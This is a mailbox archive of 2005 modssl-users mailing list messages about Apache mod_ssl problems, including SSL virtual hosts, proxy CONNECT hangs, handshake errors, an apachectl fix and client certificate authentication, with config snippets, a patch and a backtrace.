Received: from [59.93.165.232] by web304.biz.mail.mud.yahoo.com via HTTP; Mon, 06 Jun 2005 23:17:18 PDT
Date: Mon, 6 Jun 2005 23:17:18 -0700 (PDT)
From: Bibhash Roy 
Subject: Re: Apache and SSL
To: modssl-users@modssl.org
In-Reply-To: 6667
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bibhash Roy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Also let me know:

Does your Default-site have the option for SSL-Enabling?
If so what is the configuration...you may send me the
Default-virtual-host snippet from ssl.conf if it exists?

If you have defaultsite SSL-Enabled on port 443, then
you cannot have the other SSL-Enabled virtual hosts
accessible on port 443...you need to access them as:

https://SomeVirtualHost_Name:port/
OR
https://SomeVirtualHost_IP:port/



--- "Darryl W. DeLao Jr."  wrote:
> I am running Apache 2.0.46 on RHEL 3.0 ES. I have about 8 virtualhosts
> using port 80. I want to add a virtualhost for port 443. I have the
> key installed, etc. When I add a virtualhost for this SSL site in my
> ssl.conf, it works. However, all the other port 80 sites now no longer
> work. Any help is greatly appreciated.
> 
> Thanks,
> Darryl
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  8 16:44:45 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9559114D9C8; Wed,  8 Jun 2005 16:44:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (mail.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 44F7314D9A6
	for ; Wed,  8 Jun 2005 16:44:42 +0200 (CEST)
Received: (qmail 12119 invoked by uid 0); 8 Jun 2005 14:44:42 -0000
Received: from 65.29.154.11 by www52.gmx.net with HTTP;
	Wed, 8 Jun 2005 16:44:42 +0200 (MEST)
Date: Wed, 8 Jun 2005 16:44:42 +0200 (MEST)
From: "Emmanuel E" 
To: modssl-users@modssl.org
MIME-Version: 1.0
Subject: Apache Proxy on SSL enabled server CONNECT hangs
X-Priority: 3 (Normal)
X-Authenticated: #14703863
Message-ID: <9690.1118241882@www52.gmx.net>
X-Mailer: WWW-Mail 1.6 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emmanuel E" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I have the following setup of Apache on Win 32.

Apache running only on port 443 with SSL enabled and proxying enabled. 

I am using the precompiled binaries available at
http://www.apache.org/dyn/closer.cgi/perl/win32-bin/

The normal usage is like this:

web client <-https connection to proxy-> Apache Proxy on port 443 <-normal
processing of proxy request-> Remote web server.

The connection between the web client and the proxy is https or ssl
encrypted. The connection between the proxy and the remote web server may or
may not be.

This setup works fine as long as the client issues only GET and POST
requests. But when the client issues a CONNECT request (to reach a secure
remote web server via the secure proxy) the proxy server abruptly drops the
connection after a few seconds.

Without an SSL connection between the client and the proxy CONNECT works
fine.

The problem exists both on the latest version of apache 1.3 and 2.0. I have
tested them on a winxp box.

Possibly mod_ssl on win32 is not able to handle streams of unknown length
properly?

Is it possible to have a stable port of OpenSSL/mod_ssl on win32 :( ?

Regards,
Emmanuel

-- 
Geschenkt: 3 Monate GMX ProMail gratis + 3 Ausgaben stern gratis
++ Jetzt anmelden & testen ++ http://www.gmx.net/de/go/promail ++
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  8 16:47:23 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 33EE414D9AF; Wed,  8 Jun 2005 16:47:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (mail.gmx.de [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 34CAC14D9CA
	for ; Wed,  8 Jun 2005 16:47:19 +0200 (CEST)
Received: (qmail 20798 invoked by uid 0); 8 Jun 2005 14:47:19 -0000
Received: from 65.29.154.11 by www52.gmx.net with HTTP;
	Wed, 8 Jun 2005 16:47:19 +0200 (MEST)
Date: Wed, 8 Jun 2005 16:47:19 +0200 (MEST)
From: "Emmanuel E" 
To: modssl-users@modssl.org
MIME-Version: 1.0
References: <9690.1118241882@www52.gmx.net>
Subject: Apache Proxy on SSL enabled server CONNECT hangs
X-Priority: 3 (Normal)
X-Authenticated: #14703863
Message-ID: <20200.1118242039@www52.gmx.net>
X-Mailer: WWW-Mail 1.6 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emmanuel E" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry for the repost but there is a bug report also open at
http://issues.apache.org/bugzilla/show_bug.cgi?id=11232
The bug id is 11232.

Hi,

I have the following setup of Apache on Win 32.

Apache running only on port 443 with SSL enabled and proxying enabled. 

I am using the precompiled binaries available at
http://www.apache.org/dyn/closer.cgi/perl/win32-bin/

The normal usage is like this:

web client <-https connection to proxy-> Apache Proxy on port 443 <-normal
processing of proxy request-> Remote web server.

The connection between the web client and the proxy is https or ssl
encrypted. The connection between the proxy and the remote web server may or
may not be.

This setup works fine as long as the client issues only GET and POST
requests. But when the client issues a CONNECT request (to reach a secure
remote web server via the secure proxy) the proxy server abruptly drops the
connection after a few seconds.

Without an SSL connection between the client and the proxy CONNECT works
fine.

The problem exists both on the latest version of apache 1.3 and 2.0. I have
tested them on a winxp box.

Possibly mod_ssl on win32 is not able to handle streams of unknown length
properly?

Is it possible to have a stable port of OpenSSL/mod_ssl on win32 :( ?

Regards,
Emmanuel

-- 
Geschenkt: 3 Monate GMX ProMail gratis + 3 Ausgaben stern gratis
++ Jetzt anmelden & testen ++ http://www.gmx.net/de/go/promail ++

-- 
Weitersagen: GMX DSL-Flatrates mit Tempo-Garantie!
Ab 4,99 Euro/Monat: http://www.gmx.net/de/go/dsl
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  8 17:06:14 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8CE4B14D9C8; Wed,  8 Jun 2005 17:06:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay12.arbeitsamt.de (relay12.arbeitsamt.de [212.204.77.23])
	by master.modssl.org (Postfix) with ESMTP id 0C12F14D9A6
	for ; Wed,  8 Jun 2005 17:06:13 +0200 (CEST)
Message-ID: 
From: Fitzner Daniel 
To: "'modssl-users@modssl.org'" 
Cc: "'emmanuel.e@gmx.net'" 
Subject: AW: Apache Proxy on SSL enabled server CONNECT hangs
Date: Wed, 8 Jun 2005 17:06:10 +0200 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="ISO-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Fitzner Daniel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Look at this	http://issues.apache.org/bugzilla/show_bug.cgi?id=3D19188

Best regards

> -----Urspr=FCngliche Nachricht-----
> Von: Emmanuel E [mailto:emmanuel.e@gmx.net]=20
> Gesendet: Mittwoch, 8. Juni 2005 16:47
> An: modssl-users@modssl.org
> Betreff: Apache Proxy on SSL enabled server CONNECT hangs
>=20
>=20
> Sorry for the repost but there is a bug report also open at=20
> http://issues.apache.org/bugzilla/show_bug.cgi?id=3D11232
> The bug id is 11232.
>=20
> Hi,
>=20
> I have the following setup of Apache on Win 32.
>=20
> Apache running only on port 443 with SSL enabled and proxying=20
> enabled.=20
>=20
> I am using the precompiled binaries available at=20
> http://www.apache.org/dyn/closer.cgi/perl/win3> 2-bin/
>=20
> The=20
> normal usage is like this:
>=20
> web client <-https=20
> connection to proxy-> Apache Proxy on port 443 <-normal=20
> processing of proxy request-> Remote web server.
>=20
> The connection between the web client and the proxy is https=20
> or ssl encrypted. The connection between the proxy and the=20
> remote web server may or may not be.
>=20
> This setup works fine as long as the client issues only GET=20
> and POST requests. But when the client issues a CONNECT=20
> request (to reach a secure remote web server via the secure=20
> proxy) the proxy server abruptly drops the connection after a=20
> few seconds.
>=20
> Without an SSL connection between the client and the proxy=20
> CONNECT works fine.
>=20
> The problem exists both on the latest version of apache 1.3=20
> and 2.0. I have tested them on a winxp box.
>=20
> Possibly mod_ssl on win32 is not able to handle streams of=20
> unknown length properly?
>=20
> Is it possible to have a stable port of OpenSSL/mod_ssl on win32 :( ?
>=20
> Regards,
> Emmanuel
>=20
> --=20
> Geschenkt: 3 Monate GMX ProMail gratis + 3 Ausgaben stern gratis
> ++ Jetzt anmelden & testen ++ http://www.gmx.net/de/go/promail ++
>=20
> --=20
> Weitersagen: GMX DSL-Flatrates mit Tempo-Garantie!
> Ab 4,99 Euro/Monat: http://www.gmx.net/de/go/dsl=20
> =
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   =
www.modssl.org
> User Support Mailing List                      =
modssl-users@modssl.org
> Automated List Manager                            =
majordomo@modssl.org
>=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  8 17:24:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EC7F914D9C8; Wed,  8 Jun 2005 17:24:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (imap.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id AF29514D9A6
	for ; Wed,  8 Jun 2005 17:24:50 +0200 (CEST)
Received: (qmail 12085 invoked by uid 0); 8 Jun 2005 15:24:50 -0000
Received: from 65.29.154.11 by www52.gmx.net with HTTP;
	Wed, 8 Jun 2005 17:24:50 +0200 (MEST)
Date: Wed, 8 Jun 2005 17:24:50 +0200 (MEST)
From: "Emmanuel E" 
To: Fitzner Daniel 
Cc: modssl-users@modssl.org
MIME-Version: 1.0
References: 
Subject: Re: AW: Apache Proxy on SSL enabled server CONNECT hangs
X-Priority: 3 (Normal)
X-Authenticated: #14703863
Message-ID: <17133.1118244290@www52.gmx.net>
X-Mailer: WWW-Mail 1.6 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emmanuel E" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I looked at that. That seems to be an issue with mod_proxy_connect.

This issue turns up only if the proxy is running on the ssl enabled server
on the ssl enabled port.

Its a problem with mod_ssl more than anything else.

> --- Ursprüngliche Nachricht ---
> Von: Fitzner Daniel 
> An: "'modssl-users@modssl.org'" 
> Kopie: "'emmanuel.e@gmx.net'" 
> Betreff: AW: Apache Proxy on SSL enabled server CONNECT hangs
> Datum: Wed, 8 Jun 2005 17:06:10 +0200
> 
> Look at this	http://issues.apache.org/bugzilla/show_bug.cgi?id=19188
> 
> Best regards
> 
> > -----Ursprüngliche Nachricht-----
> > Von: Emmanuel E [mailto:emmanuel.e@gmx.net] 
> > Gesendet: Mittwoch, 8. Juni 2005 16:47
> > An: modssl-users@modssl.org
> > Betreff: Apache Proxy on SSL enabled server CONNECT hangs
> > 
> > 
> > Sorry for the repost but there is a bug report also open at 
> > http://issues.apache.org/bugzilla/show_bug.cgi?id=11232
> > The bug id is 11232.
> > 
> > Hi,
> > 
> > I have the following setup of Apache on Win 32.
> > 
> > Apache running only on port 443 with SSL enabled and proxying 
> > enabled. 
> > 
> > I am using the precompiled binaries available at 
> > http://www.apache.org/dyn/closer.cgi/perl/win3> 2-bin/
> > 
> > The 
> > normal usage is like this:
> > 
> > web client <-https 
> > connection to proxy-> Apache Proxy on port 443 <-normal 
> > processing of proxy request-> Remote web server.
> > 
> > The connection between the web client and the proxy is https 
> > or ssl encrypted. The connection between the proxy and the 
> > remote web server may or may not be.
> > 
> > This setup works fine as long as the client issues only GET 
> > and POST requests. But when the client issues a CONNECT 
> > request (to reach a secure remote web server via the secure 
> > proxy) the proxy server abruptly drops the connection after a 
> > few seconds.
> > 
> > Without an SSL connection between the client and the proxy 
> > CONNECT works fine.
> > 
> > The problem exists both on the latest version of apache 1.3 
> > and 2.0. I have tested them on a winxp box.
> > 
> > Possibly mod_ssl on win32 is not able to handle streams of 
> > unknown length properly?
> > 
> > Is it possible to have a stable port of OpenSSL/mod_ssl on win32 :( ?
> > 
> > Regards,
> > Emmanuel
> > 
> > -- 
> > Geschenkt: 3 Monate GMX ProMail gratis + 3 Ausgaben stern gratis
> > ++ Jetzt anmelden & testen ++ http://www.gmx.net/de/go/promail ++
> > 
> > -- 
> > Weitersagen: GMX DSL-Flatrates mit Tempo-Garantie!
> > Ab 4,99 Euro/Monat: http://www.gmx.net/de/go/dsl 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> 

-- 
Geschenkt: 3 Monate GMX ProMail gratis + 3 Ausgaben stern gratis
++ Jetzt anmelden & testen ++ http://www.gmx.net/de/go/promail ++
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 10 05:02:01 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5CB1B14D9D6; Fri, 10 Jun 2005 05:02:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.eacceleration.com (smtp.eacceleration.com [65.212.166.18])
	by master.modssl.org (Postfix) with SMTP id 013D714D994
	for ; Fri, 10 Jun 2005 05:01:59 +0200 (CEST)
Received: (qmail 25484 invoked from network); 10 Jun 2005 03:01:58 -0000
Received: from grx01-001.eacceleration.com (HELO karlk.server.accelerationsw.com) (65.212.166.2)
  by smtp.eacceleration.com with SMTP; 10 Jun 2005 03:01:58 -0000
From: Karl Knight 
To: modssl-users@modssl.org
Subject: SSL handshake interrupted by system
Date: Thu, 9 Jun 2005 20:01:47 -0700
User-Agent: KMail/1.7.1
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <200506092001.48009.karlk@eacceleration.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Karl Knight 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Has anyone seen these type of errors before and if so how can the problem be 
corrected?

	apache version 1.3.33
	mod_ssl 2.8.22
	OS FreeBSD 4.11-RELEASE

We get a continuious flow of these errors in the apache logs:

	(5770)  mod_ssl: SSL handshake interrupted by system [Hint: Stop button  	
	pressed in browser?!] (System error follows)
	(5327)  System: Resource temporarily unavailable (errno: 35)

We recently migrated from one co-location server to a new server at a 
different co-location.  The problem existed at the old location as well.  For 
the sake of not interrupting our business revenues we chose not to upgrade 
OSs or Aps at the time of migration.  We have set the httpd.conf as follows:

#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15

#
# Server-pool size regulation.  Rather than making you guess how many
# server processes you need, Apache dynamically adapts to the load it
# sees --- that is, it tries to maintain enough server processes to
# handle the current load, plus a few spare servers to handle transient
# load spikes (e.g., multiple simultaneous requests from a single
# Netscape browser).
#
# It does this by periodically checking how many servers are waiting
# for a request.  If there are fewer than MinSpareServers, it creates
# a new spare.  If there are more than MaxSpareServers, some of the
# spares die off.  The default values are probably OK for most sites.
#
MinSpareServers 20
MaxSpareServers 40

#
# Number of servers to start initially --- should be a reasonable ballpark
# figure.
#
StartServers 100

#
# Limit on total number of servers running, i.e., limit on the number
# of clients who can simultaneously connect --- if this limit is ever
# reached, clients will be LOCKED OUT, so it should NOT BE SET TOO LOW.
# It is intended mainly as a brake to keep a runaway server from taking
# the system with it as it spirals down...
#
MaxClients 500

#
# MaxRequestsPerChild: the number of requests each child process is
# allowed to process before the child dies.  The child will exit so
# as to avoid problems after prolonged use when Apache (and maybe the
# libraries it uses) leak memory or other resources.  On most systems, this
# isn't really needed, but a few (such as Solaris) do have notable leaks
# in the libraries. For these platforms, set to something like 10000
# or so; a setting of 0 means unlimited.
#
# NOTE: This value does not include keepalive requests after the initial
#       request per connection. For example, if a child process handles
#       an initial request and 10 subsequent "keptalive" requests, it
#       would only count as 1 request towards this limit.
#
MaxRequestsPerChild 0

Any ideas are welcome at this point. :)

Thanks in advance for your help.

karlk@eacceleration.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 10 13:21:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0831614D9D9; Fri, 10 Jun 2005 13:21:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mix.inar.ru (mix.inar.ru [212.14.161.14])
	by master.modssl.org (Postfix) with ESMTP id EA00614D994
	for ; Fri, 10 Jun 2005 13:21:10 +0200 (CEST)
Received: (from mike@localhost)
	by mix.inar.ru (8.8.5/8.8.5) id PAA06018
	for modssl-users@modssl.org; Fri, 10 Jun 2005 15:21:06 +0400 (MSK/MSD)
Message-Id: <200506101121.PAA06018@mix.inar.ru>
Subject: Minor bug in apachectl script (apache+mod_ssl distrib)
To: modssl-users@modssl.org
Date: Fri, 10 Jun 2005 15:21:06 +0400 (MSK/MSD)
From: Michael Kichanov 
X-Mailer: ELM [version 2.4ME+ PL117 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Kichanov 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!

I have found a small bug in 'apachectl' script (apache_1.3.33+mod_ssl-2.8.22).

'configtest' option of this script does not work inside  clause.
The simple workaround is to add next block of code into script:

configtestssl)
	if $HTTPD -t -DSSL; then
		:
	else
		ERROR=8
	fi
;;

and according to it to change an usage string

With best regards,
mike
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 10 17:39:55 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4A90514D9D6; Fri, 10 Jun 2005 17:39:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lt1.firehawksystems.com (lt1.firehawksystems.com [204.11.219.140])
	by master.modssl.org (Postfix) with ESMTP id 91FB314D994
	for ; Fri, 10 Jun 2005 17:39:53 +0200 (CEST)
Received: from [10.0.0.2] (adsl-68-77-73-124.dsl.ipltin.ameritech.net [68.77.73.124])
	(authenticated bits=0)
	by lt1.firehawksystems.com (8.13.3/8.13.3) with ESMTP id j5AFdoUT004814
	(version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NO)
	for ; Fri, 10 Jun 2005 08:39:52 -0700
X-DomainKeys: Sendmail DomainKeys Filter v0.3.0 lt1.firehawksystems.com j5AFdoUT004814
Mime-Version: 1.0 (Apple Message framework v622)
Content-Transfer-Encoding: quoted-printable
Message-Id: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
To: modssl-users@modssl.org
From: "Brian J. France" 
Subject: Connection time out problems
Date: Fri, 10 Jun 2005 10:39:46 -0500
X-Mailer: Apple Mail (2.622)
X-Virus-Scanned: ClamAV 0.85/922/Fri Jun 10 06:58:19 2005 on lt1
X-Virus-Status: Clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian J. France" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have a case where a https connection times out, which causes an alarm=20=

to trigger, apache start shutting down and mod_ssl tries to flush the=20
buffer in a non-blocking way and hangs the connection until restart=20
(see the backtrace below).

I think the cause of this is the http_main.c patch for EAPI (see below)=20=

because it inserts the ap_call_close_connection_hook before setting=20
B_EOUT instead of after.  If it would set B_OUT first and then call=20
ap_call_close_connection_hook, any ap_bflush or ap_bwrite calls would=20
return (-1) instead of trying to write data to the socket (in a=20
non-blocking way).

Thoughts?

Thanks,

Brian

--------
@@ -1541,6 +1568,10 @@
             ap_log_transaction(log_req);
         }

+#ifdef EAPI
+       ap_call_close_connection_hook(save_req->connection);
+#endif /* EAPI */
+
         ap_bsetflag(save_req->connection->client, B_EOUT, 1);
         ap_bclose(save_req->connection->client);

@@ -1549,6 +1580,9 @@
          ap_longjmp(jmpbuffer, 1);
      }
      else {                     /* abort the connection */
+#ifdef EAPI
+       ap_call_close_connection_hook(current_conn);
+#endif /* EAPI */
         ap_bsetflag(current_conn->client, B_EOUT, 1);
         ap_bclose(current_conn->client);
         current_conn->aborted =3D 1;
--------

#0  0x20307a20 in write () from /usr/lib/libc.so.4
#1  0x20220456 in sock_write () from /home/y/lib/libcrypto.so
#2  0x2021e5cf in BIO_write () from /home/y/lib/libcrypto.so
#3  0x201bc503 in ssl3_write_pending () from /home/y/lib/libssl.so
#4  0x201bc26a in do_ssl3_write () from /home/y/lib/libssl.so
#5  0x201bc1e2 in ssl3_write_bytes () from /home/y/lib/libssl.so
#6  0x201ba665 in ssl3_write () from /home/y/lib/libssl.so
#7  0x201c1b92 in SSL_write () from /home/y/lib/libssl.so
#8  0x3b7d6 in ssl_io_hook_write (fb=3D0x267044, buf=3D0x2e900c=20
""..., len=3D4096) at ssl_engine_io.c:384
#9  0x67741 in ap_hook_call_func (ap=3D0x9fbfb404 "4=B4=BF\237Dp&",=20
he=3D0xa5080, hf=3D0xa7110) at ap_hook.c:649
#10 0x673f6 in ap_hook_call (hook=3D0x7c0e4 "ap::buff::write") at=20
ap_hook.c:382
#11 0x48b1e in ap_write (fb=3D0x267044, buf=3D0x2e900c, nbyte=3D4096) at=20=

buff.c:336
#12 0x49676 in write_with_errors (fb=3D0x267044, buf=3D0x2e900c,=20
nbyte=3D4096) at buff.c:391
#13 0x49f72 in bflush_core (fb=3D0x267044) at buff.c:1760
#14 0x49ffa in ap_bflush (fb=3D0x267044) at buff.c:1805
#15 0x393f3 in ssl_hook_CloseConnection (conn=3D0xc8068) at=20
ssl_engine_kernel.c:474
#16 0x525f6 in ap_call_close_connection_hook (c=3D0xc8068) at=20
http_main.c:523
#17 0x52ea7 in timeout (sig=3D14) at http_main.c:1738
#18 0x52fcc in alrm_handler (sig=3D14) at http_main.c:1812
#19 0x9fbfffac in ?? ()
#20 0x2021e5cf in BIO_write () from /home/y/lib/libcrypto.so
#21 0x201bc503 in ssl3_write_pending () from /home/y/lib/libssl.so
#22 0x201bc440 in do_ssl3_write () from /home/y/lib/libssl.so
#23 0x201bc1e2 in ssl3_write_bytes () from /home/y/lib/libssl.so
#24 0x201ba665 in ssl3_write () from /home/y/lib/libssl.so
#25 0x201c1b92 in SSL_write () from /home/y/lib/libssl.so
#26 0x3b7d6 in ssl_io_hook_write (fb=3D0x267044, buf=3D0x2e900c=20
""..., len=3D4096) at ssl_engine_io.c:384
#27 0x67741 in ap_hook_call_func (ap=3D0x9fbfb930 "`=B9=BF\237Dp&",=20
he=3D0xa5080, hf=3D0xa7110) at ap_hook.c:649
#28 0x673f6 in ap_hook_call (hook=3D0x7c0e4 "ap::buff::write") at=20
ap_hook.c:382
#29 0x48b1e in ap_write (fb=3D0x267044, buf=3D0x2e900c, nbyte=3D4096) at=20=

buff.c:336
#30 0x49676 in write_with_errors (fb=3D0x267044, buf=3D0x2e900c,=20
nbyte=3D4096) at buff.c:391
#31 0x49f72 in bflush_core (fb=3D0x267044) at buff.c:1760
#32 0x49ffa in ap_bflush (fb=3D0x267044) at buff.c:1805

< internal code frames removed >

#38 0x4ac04 in ap_invoke_handler (r=3D0x1ef034) at http_config.c:479
#39 0x5d0ac in process_request_internal (r=3D0x1ef034) at=20
http_request.c:1366
#40 0x5d107 in ap_process_request (r=3D0x1ef034) at http_request.c:1382
#41 0x556ba in child_main (child_num_arg=3D87) at http_main.c:5388
#42 0x559ad in make_child (s=3D0x9c2e8, slot=3D87, now=3D1118326412) at=20=

http_main.c:5629
#43 0x55c38 in perform_idle_server_maintenance () at http_main.c:5853
#44 0x5617a in standalone_main (argc=3D11, argv=3D0x9fbff028) at=20
http_main.c:6165
#45 0x5671c in main (argc=3D11, argv=3D0x9fbff028) at http_main.c:6448

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 11 10:34:04 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8E8D414D9E0; Sat, 11 Jun 2005 10:34:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from natsmtp00.rzone.de (natsmtp00.rzone.de [81.169.145.165])
	by master.modssl.org (Postfix) with ESMTP id 43D2814D990
	for ; Sat, 11 Jun 2005 10:34:03 +0200 (CEST)
Received: from bitgully.knitter.privat (p54934F40.dip.t-dialin.net [84.147.79.64])
	by post.webmailer.de (8.13.1/8.13.1) with ESMTP id j5B8Y2ZN006608
	for ; Sat, 11 Jun 2005 10:34:03 +0200 (MEST)
Received: from blechkiste.KNITTER.PRIVAT (blechkiste.KNITTER.PRIVAT [192.168.0.253])
	by bitgully.knitter.privat (Postfix) with ESMTP id 9DA3A3F684
	for ; Sat, 11 Jun 2005 10:34:12 +0200 (CEST)
From: Harry Knitter 
To: modssl-users@modssl.org
Subject: SSL client authentication
Date: Sat, 11 Jun 2005 10:34:09 +0200
User-Agent: KMail/1.7.1
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200506111034.09984.harry@knitter-edv-beratung.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harry Knitter 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I=B4m trying to setup a system where the client authentication for a special
directory should be done via client certificates. I have set up a CA (using=
=20
OpenSSL) and the according certificate and key files for the CA the server=
=20
and a client.
The client browser (Mozilla Firefox) has all certificates necessary.
My vhost-ssl.conf (based on the standard template file) contains the
following directory entry


=A0=A0=A0=A0=A0=A0=A0=A0SSLVerifyClient=A0require
=A0=A0=A0=A0=A0=A0=A0=A0SSLVerifyDepth=A0=A01
=A0=A0=A0=A0=A0=A0=A0=A0SSLRequireSSL
=A0=A0=A0=A0=A0=A0=A0=A0SSLOptions=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0+FakeBas=
icAuth
=A0=A0=A0=A0=A0=A0=A0=A0SSLCACertificateFile=A0/etc/apache2/ssl.crt/ca.crt
=A0=A0=A0=A0=A0=A0=A0=A0SSLCipherSuite=A0HIGH:MEDIUM
=A0=A0=A0=A0=A0=A0=A0=A0SSLRequire=A0=A0=A0=A0=A0=A0%{SSL_CLIENT_S_DN_O}=A0=
eq=A0"My=A0Organisation"=A0\
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0and=A0%{SSL_CLI=
ENT_S_DN_OU}=A0eq=A0"My=A0Department"


